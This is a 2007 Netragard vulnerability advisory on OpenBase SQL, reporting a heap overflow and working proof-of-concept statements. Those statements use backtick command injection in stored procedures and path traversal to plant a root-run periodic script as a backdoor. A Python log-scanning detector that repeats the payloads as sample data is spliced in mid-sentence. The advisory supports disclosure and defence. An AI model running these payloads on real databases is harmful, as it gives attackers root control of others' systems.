Netragard Security Advisory 2007-03-13
Posted Nov 6, 2007
Authored by Kevin Finisterre, Adriel T. Desautels, Netragard | Site netragard.com

Netragard, L.L.C Advisory - Netragard's SNOsoft Research Team discovered two critical vulnerabilities in the OpenBase SQL Relational Database that can lead to full system compromise. OpenBase versions 10.0.5 and below are affected.

tags | advisory, vulnerability
SHA-256 | 461394d46dce182dddd5cd5ac8284bec3acbe0ca019c1b7a15477e4a510c19e6


********************** Netragard, L.L.C Advisory**********************
Penetration Testing, Vulnerability Assessments, Web Application Security

Strategic Reconnaissance Team
http://www.netragard.com -- "We make I.T. Safe."

--------------------------------------------------------------------------
If you intend to post this advisory on your web page please create a
clickable link back to the original Netragard advisory as the contents
of the advisory may be updated. The advisory can be found on the
Netragard website at http://www.netragard.com/

For more information about Netragard visit http://www.netragard.com

[Advisory Information]
--------------------------------------------------------------------------
Contact : Adriel T. Desautels
Researcher : Kevin Finisterre
Advisory ID : NETRAGARD-20070313
Product Name : OpenBase SQL Relational Database
Product Version : <= OpenBase 10.0.5 (All Platforms)
Vendor Name : OpenBase International, Ltd.
Type of Vulnerability : Remote Buffer Overflow, Command injection
Effort : Easy

[Product Description]
--------------------------------------------------------------------------
"For over a decade, the OpenBase family of products have been enabling
some of the most innovative business applications at work today. With
thousands of customers worldwide, OpenBase has become a brand that
companies can rely on.

OpenBase customers include AT&T, Adobe Systems, Canon, Walt Disney,
First National Bank of Chicago, MCI, Motorola, Apple, The Sharper Image
and many other innovators worldwide."

-- http://openbase.com/home-Aboutus.html --

[Technical Summary]
--------------------------------------------------------------------------
Netragard's SNOsoft Research Team discovered two critical
vulnerabilities in the OpenBase SQL Relational Database that can lead to
full system compromise.

The first vulnerability discovered is a command injection vulnerability
that affects several of the default Stored Procedures. Specifically,
it is possible to execute system commands as the root user by inserting
a series of backticks into the pre-defined Stored Procedures.

The second vulnerability discovered is a buffer overflow that causes heap
corruption. This also has the potential to lead to the execution of
arbitrary code or a Denial of Service condition.

[Technical Details]
--------------------------------------------------------------------------
1. call AsciiBackup('\`id\`')
results in commands being run as root.

desktop:/tmp kfinisterre$ tail -f /tmp/isql_messages

OpenBase ISQL version 8.0 for MacOS X
Copyright (c) 1993-2003 OpenBase International. Ltd.
All Rights Reserved.

Using database 'WOMovies' on host 'localhost'

Could not write file:uid=0(root) gid=0(wheel) groups=0(wheel)/WOMovies.bck

2. call GlobalLog("../../../path/to/file", "\n user input goes here \n")
results in root owned files being created. Combine with above for an
easy backdoor.

openbase 1> call GlobalLog("../../../../../../etc/periodic/daily/600"
, "\n/usr/bin/id > /tmp/file\n")
openbase 2> go
Data returned... calculating column widths

----------
----------
1 rows returned - 0.039 seconds (printed in 0.039 seconds)
openbase 1> call AsciiBackup('`chmod +x /etc/periodic/daily/600.msg;
/usr/sbin/periodic daily`')
openbase 2> go
Data returned... calculating column widths

----------
----------
1 rows returned - 1.825 seconds (printed in 1.826 seconds)
openbase 1>

3. select aaaaaaaaaaaaaaaaaaaa... from aaaaaaaaaaaaaaaaaaa...
results in zone_free() issues referencing 0x61616161

4. call OEMLicenseInstall("`/usr/bin/id>/tmp/aaax`","`/usr/bin/id>/tmp/bbbx
results in commands being run as root

An exploitable vulnerability exists in OpenBase in the creation of
Stored Procedures that can be used to gain NT AUTHORITY\SYSTEM or root
level privileges. Specifically, a user can create a stored procedure
with an unusually long name which will trigger a buffer overflow
condition that will result in heap corruption. If done properly, an
attacker may be able to execute arbitrary commands against the affected
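
A log-review check for the statement shapes listed above, added here as an example and not part of the Netragard advisory or of OpenBase: it flags command substitution and path traversal in stored-procedure arguments, and oversized identifiers. The sample lines are constructed, and the 64-character identifier limit and the availability of a plain-text query log are assumptions.

```python
import re

# Checks are applied to every `call`, not only the procedures the advisory
# names, because it says "several" default stored procedures are affected.
CALL = re.compile(r"\bcall\s+\w+\s*\((.*)", re.IGNORECASE | re.DOTALL)
# A quoted argument; the closing quote is optional so truncated input still parses.
QUOTED = re.compile(r"""(['"])((?:\\.|(?!\1).)*)\1?""", re.DOTALL)
# Backticks are what the advisory shows; "$(" is the equivalent shell form.
CMD_SUBST = re.compile(r"`|\$\(")
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
MAX_IDENT = 64  # assumed limit; set it to the longest legitimate name in your schema

def inspect(statement):
    """Return sorted finding labels for one logged SQL statement."""
    findings = set()
    call = CALL.search(statement)
    if call:
        for quoted in QUOTED.finditer(call.group(1)):
            arg = quoted.group(2)
            if CMD_SUBST.search(arg):
                findings.add("command-substitution")
            if TRAVERSAL.search(arg):
                findings.add("path-traversal")
    # Identifier length is measured outside string literals.
    bare = QUOTED.sub("", statement)
    if any(len(word) > MAX_IDENT for word in re.findall(r"\w+", bare)):
        findings.add("oversized-identifier")
    return sorted(findings)

def scan(lines):
    """Map 1-based line number to findings, for lines that have any."""
    return {n: f for n, line in enumerate(lines, 1) if (f := inspect(line))}

# Constructed query-log lines: two benign statements (table name and backup
# directory are assumptions) followed by the statement shapes from the advisory.
SAMPLE_LOG = [
    "select title from MOVIE where title like 'A%'",
    "call AsciiBackup('/Backups/nightly')",
    "call AsciiBackup('`id`')",
    'call GlobalLog("../../../../../../etc/periodic/daily/600", "\\n/usr/bin/id > /tmp/file\\n")',
    "select " + "a" * 300 + " from " + "a" * 300,
    'call OEMLicenseInstall("`/usr/bin/id>/tmp/aaax`","`/usr/bin/id>/tmp/bbbx',
]

if __name__ == "__main__":
    for lineno, findings in scan(SAMPLE_LOG).items():
        print(lineno, ", ".join(findings))
```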

[Proof Of Concept]
--------------------------------------------------------------------------
See Above

[Vendor Status]
--------------------------------------------------------------------------
Vendor Notified on 03/05/07
Vendor Patched on 03/09/07
Vendor quote:

"OpenBase now runs as the 'openbase' user for security reasons. I would
like to publicly thank Kevin Finisterre for his input."

------------------------http://www.netragard.com--------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit
